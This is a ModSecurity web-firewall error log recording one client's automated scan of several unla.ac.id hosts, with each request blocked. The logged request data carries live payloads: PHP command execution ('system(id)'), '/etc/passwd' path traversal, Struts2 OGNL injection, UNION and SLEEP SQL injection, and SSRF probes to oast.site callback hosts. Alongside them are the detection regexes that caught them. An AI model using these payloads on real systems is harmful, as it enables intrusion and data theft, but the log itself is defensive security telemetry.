[Tue Aug 29 11:30:13.354383 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ][]=& found within ARGS:query: app=Common&model=Schedule&method=runSchedule&id[status]=1&id[method]=Schedule->_validationFieldItem&id[4]=function&[6][]=&id[0]=cmd&id[1]=assert&id[args]=cmd=system(id)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10VcCo-f0AAAPLwBIAAAAX"]
[Tue Aug 29 11:30:13.376097 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ][]=& found within ARGS:query: app=Common&model=Schedule&method=runSchedule&id[status]=1&id[method]=Schedule->_validationFieldItem&id[4]=function&[6][]=&id[0]=cmd&id[1]=assert&id[args]=cmd=system(id)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO10VcCo-f0AAAOM4T4AAAAU"]
[Tue Aug 29 11:30:13.398177 2023] [:error] [pid 889] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:pagina. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../../ found within ARGS:pagina: ../../../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/i3geo/exemplos/codemirror.php"] [unique_id "ZO10VcCo-f0AAAN5YFkAAAAN"]
[Tue Aug 29 11:30:13.438515 2023] [:error] [pid 977] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:pagina. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../../ found within ARGS:pagina: ../../../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/i3geo/exemplos/codemirror.php"] [unique_id "ZO10VcCo-f0AAAPRNXEAAAAf"]
[Tue Aug 29 11:30:13.447456 2023] [:error] [pid 978] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:pagina. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../../ found within ARGS:pagina: ../../../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/i3geo/exemplos/codemirror.php"] [unique_id "ZO10VcCo-f0AAAPS5vgAAAAh"]
[Tue Aug 29 11:30:13.464865 2023] [:error] [pid 977] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ][]=& found within ARGS:query: app=Common&model=Schedule&method=runSchedule&id[status]=1&id[method]=Schedule->_validationFieldItem&id[4]=function&[6][]=&id[0]=cmd&id[1]=assert&id[args]=cmd=system(id)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10VcCo-f0AAAPRNXIAAAAf"]
[Tue Aug 29 11:30:13.478399 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ][]=& found within ARGS:query: app=Common&model=Schedule&method=runSchedule&id[status]=1&id[method]=Schedule->_validationFieldItem&id[4]=function&[6][]=&id[0]=cmd&id[1]=assert&id[args]=cmd=system(id)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10VcCo-f0AAAOM4UMAAAAU"]
[Tue Aug 29 11:30:14.424584 2023] [:error] [pid 974] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:pagina. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../../ found within ARGS:pagina: ../../../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/i3geo/exemplos/codemirror.php"] [unique_id "ZO10VsCo-f0AAAPOhWkAAAAa"]
[Tue Aug 29 11:30:14.425121 2023] [:error] [pid 902] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ][]=& found within ARGS:query: app=Common&model=Schedule&method=runSchedule&id[status]=1&id[method]=Schedule->_validationFieldItem&id[4]=function&[6][]=&id[0]=cmd&id[1]=assert&id[args]=cmd=system(ver)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10VsCo-f0AAAOGaeIAAAAS"]
[Tue Aug 29 11:30:14.427826 2023] [:error] [pid 910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:pagina. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../../ found within ARGS:pagina: ../../../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/i3geo/exemplos/codemirror.php"] [unique_id "ZO10VsCo-f0AAAOOuSQAAAAW"]
[Tue Aug 29 11:30:14.575756 2023] [:error] [pid 973] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ][]=& found within ARGS:query: app=Common&model=Schedule&method=runSchedule&id[status]=1&id[method]=Schedule->_validationFieldItem&id[4]=function&[6][]=&id[0]=cmd&id[1]=assert&id[args]=cmd=system(id)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10VsCo-f0AAAPNBP0AAAAZ"]
[Tue Aug 29 11:30:15.347234 2023] [:error] [pid 983] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: %{(# found within ARGS:name: %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#q=(44660*44784)).(#q)}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/integration/saveGangster.action"] [unique_id "ZO10V8Co-f0AAAPXAiEAAAAi"]
[Tue Aug 29 11:30:15.351375 2023] [:error] [pid 902] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: %{(# found within ARGS:name: %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#q=(44660*44784)).(#q)}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/integration/saveGangster.action"] [unique_id "ZO10V8Co-f0AAAOGaeYAAAAS"]
[Tue Aug 29 11:30:15.352338 2023] [:error] [pid 976] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: %{(# found within ARGS:name: %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#q=(44660*44784)).(#q)}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/integration/saveGangster.action"] [unique_id "ZO10V8Co-f0AAAPQkeEAAAAe"]
[Tue Aug 29 11:30:15.353444 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:user_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:user_id: 11 UNION ALL SELECT NULL,CONCAT(1,md5(999999999),1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10V8Co-f0AAAPMl9kAAAAY"]
[Tue Aug 29 11:30:15.373728 2023] [:error] [pid 964] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: %{(# found within ARGS:name: %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#q=(44660*44784)).(#q)}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/integration/saveGangster.action"] [unique_id "ZO10V8Co-f0AAAPENakAAAAQ"]
[Tue Aug 29 11:30:15.375300 2023] [:error] [pid 902] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:user_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:user_id: 11 UNION ALL SELECT NULL,CONCAT(1,md5(999999999),1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10V8Co-f0AAAOGaecAAAAS"]
[Tue Aug 29 11:30:15.375501 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:user_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:user_id: 11 UNION ALL SELECT NULL,CONCAT(1,md5(999999999),1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10V8Co-f0AAAO8724AAAAF"]
[Tue Aug 29 11:30:15.376193 2023] [:error] [pid 906] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:user_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:user_id: 11 UNION ALL SELECT NULL,CONCAT(1,md5(999999999),1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10V8Co-f0AAAOKNl0AAAAK"]
[Tue Aug 29 11:30:15.376760 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:user_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:user_id: 11 UNION ALL SELECT NULL,CONCAT(1,md5(999999999),1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10V8Co-f0AAAPMl9oAAAAY"]
[Tue Aug 29 11:30:15.401970 2023] [:error] [pid 910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: %{(# found within ARGS:name: %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#q=(44660*44784)).(#q)}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/integration/saveGangster.action"] [unique_id "ZO10V8Co-f0AAAOOuSsAAAAW"]
[Tue Aug 29 11:30:16.331319 2023] [:error] [pid 974] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:in\\\\s*?\\\\(+\\\\s*?select)|(?:(?:n?and|x?x?or|div|like|between|and|not |\\\\|\\\\||\\\\&\\\\&)\\\\s+[\\\\s\\\\w+]+(?:regexp\\\\s*?\\\\(|sounds\\\\s+like\\\\s*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]|[=\\\\d]+x))|([\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\s*?\\\\d\\\\s*?(?:--|#)) ..." at ARGS_NAMES:{\\\\"url\\\\":\\\\"http://cjmn8l5jmimk2adbbnlgtarctcfadwp43.oast.site\\\\"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "239"] [id "981246"] [msg "Detects basic SQL authentication bypass attempts 3/3"] [data "Matched Data: \\x22url\\x5c\\x22:\\x5c\\x22 found within ARGS_NAMES:{\\x5c\\x5c\\x22url\\x5c\\x5c\\x22:\\x5c\\x5c\\x22http://cjmn8l5jmimk2adbbnlgtarctcfadwp43.oast.site\\x5c\\x5c\\x22}: {\\x5c\\x22url\\x5c\\x22:\\x5c\\x22http://cjmn8l5jmimk2adbbnlgtarctcfadwp43.oast.site\\x5c\\x22}"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/wp-json/visualizer/v1/upload-data"] [unique_id "ZO10WMCo-f0AAAPOhW0AAAAa"]
[Tue Aug 29 11:30:16.338670 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:user_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:user_id: 11 UNION ALL SELECT NULL,CONCAT(1,md5(999999999),1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10WMCo-f0AAAPDnvQAAAAP"]
[Tue Aug 29 11:30:16.347486 2023] [:error] [pid 906] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{\\\\"url\\\\":\\\\"http://cjmn8l5jmimk2adbbnlgaeuzb5zn6k9j8.oast.site\\\\"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: : found within ARGS_NAMES:{\\x5c\\x5c\\x22url\\x5c\\x5c\\x22:\\x5c\\x5c\\x22http://cjmn8l5jmimk2adbbnlgaeuzb5zn6k9j8.oast.site\\x5c\\x5c\\x22}: {\\x5c\\x22url\\x5c\\x22:\\x5c\\x22http://cjmn8l5jmimk2adbbnlgaeuzb5zn6k9j8.oast.site\\x5c\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-json/visualizer/v1/upload-data"] [unique_id "ZO10WMCo-f0AAAOKNl8AAAAK"]
[Tue Aug 29 11:30:16.349869 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{\\\\"url\\\\":\\\\"http://cjmn8l5jmimk2adbbnlgzmfrifekbqf84.oast.site\\\\"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: : found within ARGS_NAMES:{\\x5c\\x5c\\x22url\\x5c\\x5c\\x22:\\x5c\\x5c\\x22http://cjmn8l5jmimk2adbbnlgzmfrifekbqf84.oast.site\\x5c\\x5c\\x22}: {\\x5c\\x22url\\x5c\\x22:\\x5c\\x22http://cjmn8l5jmimk2adbbnlgzmfrifekbqf84.oast.site\\x5c\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/wp-json/visualizer/v1/upload-data"] [unique_id "ZO10WMCo-f0AAAPMl90AAAAY"]
[Tue Aug 29 11:30:16.350999 2023] [:error] [pid 966] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:in\\\\s*?\\\\(+\\\\s*?select)|(?:(?:n?and|x?x?or|div|like|between|and|not |\\\\|\\\\||\\\\&\\\\&)\\\\s+[\\\\s\\\\w+]+(?:regexp\\\\s*?\\\\(|sounds\\\\s+like\\\\s*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]|[=\\\\d]+x))|([\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\s*?\\\\d\\\\s*?(?:--|#)) ..." at ARGS_NAMES:{\\\\"url\\\\":\\\\"http://cjmn8l5jmimk2adbbnlgeckgzw8dsog3m.oast.site\\\\"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "239"] [id "981246"] [msg "Detects basic SQL authentication bypass attempts 3/3"] [data "Matched Data: \\x22url\\x5c\\x22:\\x5c\\x22 found within ARGS_NAMES:{\\x5c\\x5c\\x22url\\x5c\\x5c\\x22:\\x5c\\x5c\\x22http://cjmn8l5jmimk2adbbnlgeckgzw8dsog3m.oast.site\\x5c\\x5c\\x22}: {\\x5c\\x22url\\x5c\\x22:\\x5c\\x22http://cjmn8l5jmimk2adbbnlgeckgzw8dsog3m.oast.site\\x5c\\x22}"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "informatika.unla.ac.id"] [uri "/wp-json/visualizer/v1/upload-data"] [unique_id "ZO10WMCo-f0AAAPGfrMAAAAV"]
[Tue Aug 29 11:30:16.352585 2023] [:error] [pid 867] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: %{(# found within ARGS:name: %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#q=(44660*44784)).(#q)}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/integration/saveGangster.action"] [unique_id "ZO10WMCo-f0AAANjpwcAAAAT"]
[Tue Aug 29 11:30:16.353358 2023] [:error] [pid 959] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:union\\\\s*?(?:all|distinct|[(!@]*?)?\\\\s*?[([]*?\\\\s*?select\\\\s+)|(?:\\\\w+\\\\s+like\\\\s+[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98])|(?:like\\\\s*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\%)|(?:[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\s*?like\\\\W*?[\\"'`\\xc2\\xb4 ..." at ARGS_NAMES:{\\\\"url\\\\":\\\\"http://cjmn8l5jmimk2adbbnlg8p9hgikm8y1fu.oast.site\\\\"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "223"] [id "981245"] [msg "Detects basic SQL authentication bypass attempts 2/3"] [data "Matched Data: \\x22:\\x5c\\x22http://c found within ARGS_NAMES:{\\x5c\\x5c\\x22url\\x5c\\x5c\\x22:\\x5c\\x5c\\x22http://cjmn8l5jmimk2adbbnlg8p9hgikm8y1fu.oast.site\\x5c\\x5c\\x22}: {\\x5c\\x22url\\x5c\\x22:\\x5c\\x22http://cjmn8l5jmimk2adbbnlg8p9hgikm8y1fu.oast.site\\x5c\\x22}"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "ft.unla.ac.id"] [uri "/wp-json/visualizer/v1/upload-data"] [unique_id "ZO10WMCo-f0AAAO-1oAAAAAI"]
[Tue Aug 29 11:30:17.386980 2023] [:error] [pid 976] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:debit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  (9277=9277 found within ARGS:debit: (CASE WHEN (9277=9277) THEN SLEEP(6) ELSE 9277 END)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10WcCo-f0AAAPQkeUAAAAe"]
